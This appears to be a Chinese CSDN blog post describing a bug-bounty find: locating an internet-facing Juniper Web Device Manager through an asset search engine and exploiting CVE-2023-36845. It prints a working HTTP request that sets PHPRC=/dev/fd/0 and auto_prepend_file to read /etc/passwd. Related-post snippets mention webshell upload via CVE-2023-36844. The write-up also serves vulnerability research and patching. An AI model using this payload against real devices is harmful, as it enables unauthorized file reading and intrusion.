记src一处Juniper远程命令执行

已于 2023-10-27 14:29:53 修改
阅读量157 收藏
点赞数
分类专栏: 渗透测试 文章标签: 服务器 运维 web安全 安全 网络安全
于 2023-10-26 16:06:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134055479
版权

目录

一、hunter搜索web.title=”Juniper Web Device Manager”,查找到香港的一处资产。

二、访问相关网页,界面就是Juniper登录界面。

三、根据编号为CVE-2023-36845的利用方法,抓包,修改提交方式,成功读取到文件。

一、hunter搜索web.title=”Juniper Web Device Manager”,查找到香港的一处资产。

图片

二、访问相关网页,界面就是Juniper登录界面。

图片

三、根据编号为CVE-2023-36845的利用方法,抓包,修改提交方式,成功读取到文件。

原始包如下:
 

图片


payload如下:

 

  1.  
    POST /?PHPRC=/dev/fd/0 HTTP/1.1
     
  2.  
    Host: {{Hostname}}
     
  3.  
    Content-Type: application/x-www-form-urlencoded
     
  4.  
     
  5.  
    auto_prepend_file="/etc/passwd"
     
 

修改传参方式,并按照上述payload在路径后面拼接上”?PHPRC=/dev/fd/0”,请求体中加入auto_prepend_file参数。结果如下:
 

图片
 

 

                            更多黑客渗透视频 欢迎关注领取
 


                

        

        

        

    




    

      

        

            

              
                
                  zkzq
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Goby 漏洞发布|Junos webauth_operation.php 文件上传漏洞(CVE-2023-36844)

				
			

			

				

					m0_46699477的博客
				

				

					09-14
					
					569
					
				

			

		

		

			
				
Junos 是 Juniper Networks 生产的一款可靠的高性能网络操作系统。攻击者可利用 Junos 操作系统的 J-Web 服务 /webauth_operation.php 路由上传 php webshell,通过?PHPRC 参数进行包含,进入控制整个 web 服务器

			
		

	



                

              
                



	

		

			

				
					
Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

				
			

			

				

					holyxp的博客
				

				

					10-10
					
					761
					
				

			

		

		

			
				
Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。它存在一个 PHP 环境变量操纵漏洞,影响 Juniper SRX防火墙和EX交换机。 攻击者可未经授权进行远程命令执行

			
		

	



                


  
              

                


	

		

			

				
					
Juniper_RCE漏洞_CVE-2023-36845漏洞复现(附EXP)

				
			

			

				

					m0_64366018的博客
				

				

					01-15
					
					839
					
				

			

		

		

			
				
执行命令,先base64编码。

			
		

	





	

		

			

				
					
漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

				
			

			

				

					qq_53003652的博客
				

				

					10-08
					
					603
					
				

			

		

		

			
				
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

			
		

	



		

			
		



	

		

			

				
					
配置juniper交换机web管理界面

				
			

			

				

					weixin_34218579的博客
				

				

					05-13
					
					2736
					
				

			

		

		

			
				
root@:RE:0% cli
root> configure 进入配置模式
root#
root# set system root-authentication plain-text-password 为root用户设置一个密码,不然保存不了,默认root用户是不能telnet的.
New password:
Retype new password:
...

			
		

	





	

		

			

				
					
Juniper防火墙基本命令.pdf

				
			

			

				

					09-29
				

			

		

		

			
				
Juniper防火墙基本命令.pdf

			
		

	





	

		

			

				
					
juniper常用命令大全

				
			

			

				

					08-25
				

			

		

		

			
				
juniper的一些常用命令。喜欢的朋友可以下载来看,纯手工总结的。

			
		

	





	

		

			

				
					
Juniper交换机常用命令

				
			

			

				

					12-14
				

			

		

		

			
				
### Juniper交换机常用命令详解  #### 一、概述  Juniper交换机是网络设备中的重要组成部分,其命令行界面提供了强大的配置与管理功能。本文将详细介绍Juniper交换机的一些常用命令及其用法,帮助网络管理员更好地...

			
		

	





	

		

			

				
					
驱动服务用于Juniper,Cisco的命令执行.rar

				
			

			

				

					06-11
				

			

		

		

			
				
和cisco的概念不一样,Juniper的Loopback 端口只有一个,但可以划分子端口(在使用MPLS VPN时),只能使用/32的地址。  可能熟悉Juniper 命令行接口的朋友比较少  具体配置:  Cisco 路由器配置:  !  version 12.3  ...

			
		

	





	

		

			

				
					
Juniper常用命令.pdf

				
			

			

				

					01-05
				

			

		

		

			
				
### Juniper常用命令详解  #### 一、基本配置与管理  **标题与描述解析:**  在标题“Juniper常用命令.pdf”以及描述“数通”中提到的关键信息是关于Juniper设备的一些常用命令,主要应用于网络通信(数通)领域。...

			
		

	





	

		

			

				
					
Juniper设备日常操作指南

				
			

			

				

					Jian Sun_的博客
				

				

					07-28
					
					5741
					
				

			

		

		

			
				
juniper设备日常操作指南

			
		

	





	

		

			

				
					
TF功能指南 | ​使用Device Manager管理TF物理路由器

				
			

			

				

					TungstenFabric的博客
				

				

					11-24
					
					1393
					
				

			

		

		

			
				
基于不同的场景配置,将TF的功能扩展到物理路由器。

			
		

	





	

		

			

				
					
Juniper SRX防火墙默认用户名和密码

				
			

			

				

					weixin_33782386的博客
				

				

					11-27
					
					7947
					
				

			

		

		

			
				
处理过程:


  Juniper SRX系列防火墙是基于Juniper的JNOS系统的。初次登陆用户名是root和密码分别空。
进入后请首先更改密码。命令如下:
root>
root> configure
Entering configuration mode
[edit]
Root#
root# set system root-auth...

			
		

	





	

		

			

				
					
挖矿木马攻破了服务器

					
最新发布

				
			

			

				

					中年程序员一枚的博客
				

				

					08-09
					
					1123
					
				

			

		

		

			
				
systemctl status 6058  #  6058为病毒的PID。然后干掉,或者权限屏蔽等都可以,只要不执行,就没有危险!过一分钟后,服务又开始狂刷cpu。最近被国外的挖矿木马攻破了服务器。#top  看看什么占用cpu高。第四步根据pid查到服务地址。#last指令查看登录ip。第三步杀死狂刷CPU的服务。

			
		

	





	

		

			

				
					
linux 目录详解

				
			

			

				

					zhanglinlang的专栏
				

				

					08-08
					
					550
					
				

			

		

		

			
				
名称
作用




/
根目录系统的起点,跟目录下只放目录不要直接放文件


/bin
存放所有用户都可以使用的Linux基本操作命令(如ls、cp、mkdir等)。这些命令通常是用于系统管理和日常操作的常用工具


/sbin
存放系统管理相关的二进制文件,这些文件通常是系统管理员使用的命令,如fdisk、shutdown、mount等。与/bin目录不同的是,/sbin目录中的命令普通用户通常只能查看而不能执行。


/boot
存放引导相关文件,如Linux内核文件(vmlinuz)和引导装载

			
		

	





	

		

			

				
					
服务器硬件及RAID配置

				
			

			

				

					2401_83958584的博客
				

				

					08-08
					
					327
					
				

			

		

		

			
				
为是多个硬盘组合成一个,故可并行写操作,写入速度提高,但此方式硬盘数据没有冗余,最少由三个硬盘组成,它将数据分散存储于阵列中的每个硬盘,并且还伴有一。个数据校验位,数据位与校验位通过算法能相互验证,当丢失其中的一位时,读操作速度有所提高,写操作理论上与单硬盘速度一样,但由于数据需。,它将两个或多个硬盘组成一个逻辑硬盘,容量是所有硬盘之和,因。,它最少由两个硬盘组成,且两个硬盘上存储的数据均相同,以实现。没有容错,一旦一个物理硬盘损坏,则所有数据均丢失。是先将数据进行镜像操作,然后再对数据进行分组,

			
		

	





	

		

			

				
					
Linux磁盘管理与文件系统(二):实用工具和命令、fdisk分区示例

				
			

			

				

					shyuu的博客
				

				

					08-08
					
					979
					
				

			

		

		

			
				
Linux磁盘管理与文件结构(二),主要讲解实用工具和命令、fdisk分区示例
本篇我们讲解磁盘工具fdisk、创建文件系统、挂载和卸载文件系统以及配置启动自动挂载。
含一个实验:使用fdisk命令创建分区,有详细步骤。

			
		

	





	

		

			

				
					
JUNIPER交换机命令指南:日常维护与配置

				
			

			

				

					
				

			

		

		

			
				
"这是一本面向孩子的编程启蒙书籍,涵盖了日常维护命令,主要针对Juniper交换机的配置和管理。内容包括查看硬件序列号、软件版本、CPU信息、设备告警、硬件环境、接口VRRP状态等基本操作,以及交换机的基础知识,如...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值